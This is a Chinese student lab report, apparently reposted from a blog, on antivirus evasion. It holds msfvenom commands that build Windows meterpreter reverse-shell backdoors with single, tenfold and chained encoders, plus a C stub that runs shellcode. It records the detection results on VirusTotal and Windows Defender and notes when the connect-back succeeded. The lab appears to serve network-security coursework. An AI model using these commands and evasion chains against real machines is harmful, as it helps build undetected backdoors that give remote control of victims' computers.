Exp3:MAL_免杀原理与实践
目录
- 1.实验环境
- 2.实践内容
- 2.1 msfvenom
- 2.1.1 msfvenom直接生成
- 2.1.2 msfvenom 编码一次
- 2.1.3 msfvenom 编码多次
- 2.2 Veil_evasion免杀实践
- 2.3 C语言调用Shellcode
- 2.3.1Linux平台交叉编译Windows应用
- 2.3.2VisualStudio
- 2.1 msfvenom
1.实验环境
病毒扫描引擎:virustotal.
靶机:windows8.1+windows defender
2.实践内容
2.1 msfvenom
2.1.1 msfvenom直接生成
利用msfvenom
直接生成一个后门,上传到virustotal.扫描。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.243 LPORT=443 -f exe > backdoor.31.243.exe
- 实验结果
可以看出结果十分不理想。
放入主机立刻被windows defender检测隔离。
2.1.2 msfvenom 编码一次
- 使用命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.31.243 LPORT=443 -f exe > encoded_1.exe
实验结果
2.1.3 msfvenom 编码多次
- 使用命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.31.243 LPORT=443 -f exe > encoded_10.exe
- 实验结果
2.2 Veil_evasion免杀实践
2.3 C语言调用Shellcode
2.3.1Linux平台交叉编译Windows应用
利用指令会生成一个c语言格式的Shellcode数组。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=443 -f c
编译调用shellcode。
int main()
{int(*func)() = (int(*)())buf;func();}
实验结果
2.3.2VisualStudio
- 实验原理:利用指令会生成一个c语言格式的Shellcode数组。之后利用C语言编程调用shellcode数组,在windows平台生成.exe, 在靶机上运行。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.138 LPORT=443 -f c
与上一个程序用相同的shellcode,将生成的C语言shellcode数组写成win32程序。不同的是此时用到了call
函数。
实验结果
这次结果比上面好,现在尝试能否使用后门回连。
报错,需要安装vcredist 2013 x86
回连成功,后门可以使用。2.3.3动态加密shellcode
对比前两次结果,同一个shellcode被查杀的结果存在差异,很难判断
call
是否被杀毒软件定义为一个危险行为,下面将同一个shellcode动态加密一下,看看能不能对特征码有没有影响。
- 实验结果
shellcode使用了下面的命令
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.31.243 LPORT=443 R |msfvenom -e x86/shikata_ga_nai -c 4 -t raw|msfvenom -e x86/call4_dword_xor -c 3 -t raw|msfvenom -e x86/context_time -c 3 -t raw|msfvenom -e x86/jmp_call_additive -c 4 -t raw|msfvenom -e x86/shikata_ga_nai -c 4 -t exe > encode_31.243.exe
使用的编码次数太多,虽然达到了免杀效果,但是影响了使用,回连失败。
转载于:https://www.cnblogs.com/ikari/p/8747038.html
Exp3:MAL_免杀原理与实践相关推荐
- 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践
2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践 --------CONTENTS-------- 1. 免杀原理与实践说明 实验说明 基础问题回答 2. 使用msf ...
- 2018-2019-2 20165209 《网络对抗技术》Exp3:免杀原理与实践
2018-2019-2 20165209 <网络对抗技术>Exp3:免杀原理与实践 1 免杀原理与实验内容 1.1 免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中 ...
- 20145308 《网络对抗》 MAL_免杀原理及实践 学习总结
20145308 <网络对抗> MAL_免杀原理及实践 学习总结 实践内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免 ...
- 2017-2018-2 20155315《网络对抗技术》Exp3:免杀原理与实践
实验目的 通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力. 教程 实验内容 使用msf编码器,msfvenom,veil-evasion,shellcode编程等免杀工具 ...
- 20145221高其_免杀原理与实践
20145221高其_免杀原理与实践 免杀 概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻 ...
- 20145326蔡馨熠《网络对抗》——免杀原理与实践
20145326蔡馨熠<网络对抗>--免杀原理与实践 报告内容 1.理解免杀技术原理. 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti- ...
- 2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...
- 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践
目录 2018-2019 20165208 网络对抗 Exp3 免杀原理与实践 实验内容 基础问题回答 实践过程记录 任务一:正确使用免杀工具或技巧 任务二:通过组合应用各种技术实现恶意代码免杀 任务 ...
- 20164301 Exp3 免杀原理与实践
Exp3 免杀原理与实践 1. 实践内容 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 1.2 通过组合应 ...
最新文章
- 物流信息管理系统MySQL设计,物流管理系统的SQL数据库设计(含代码)
- 每天一个linux命令(6):rmdir 命令
- java 运算符表达式
- Ardino基础教程 10_光控声音
- mysql 源代码16384_MySQL源码:Innobase文件系统管理
- 【飞秋】基于Html5的Canvas实现的Clocks (钟表)
- asp.core api 通过socket和服务器通信发送udp_读懂Java中的Socket编程
- Testng.xml文件讲解
- c语言1076素数,大学C语言考试题库(答案)-20210412093908.docx-原创力文档
- 完全免费的公众号文章批量下载器
- elasticsearch 匹配发音相同单词的方案
- 计算机数值计算方法答案,数值计算方法习题解答.pdf
- 网上订餐php论文,php032网上订餐系统
- Mac邮件客户端(Edison Mail)的功能特点
- mysql断开连接_MYSQL,使用什么命令可以断开所有用户的表连接?
- Ubuntu18设置4K屏幕缩放125%
- LeetCode-分数排名
- 智能优化算法——灰狼优化算法(PythonMatlab实现)
- Jmeter+Ant+Jenkins自动化接口测试框架
- Pytorch可视化_cartopy+matplotlib_绘制雷达图像
热门文章
- el-table 树形表格 自定义展开图标_IconJar for Mac(图标素材设计软件)
- 为什么前端工程师的工作很难找?
- python3 logging模块_python3中使用logging模块写日志,中文乱码,如何解决?
- 3dmax高版本转低版本插件_Fundebug前端JavaScript插件更新至1.8.0,兼容低版本的Android浏览器...
- java int 指针_如何在Java中使用指针?
- html可视化布局工具_简介一些蜘蛛布局标签的饼图的绘制方法
- Fatal Python error: pycurl: libcurl link-time version is older than compile-time version
- oracle数据库等级,[数据库]Oracle数据库建表并用SQL编程分等级
- IAR软件中查看代码大小
- STM8 ADC转换模式-------带缓存的连续模式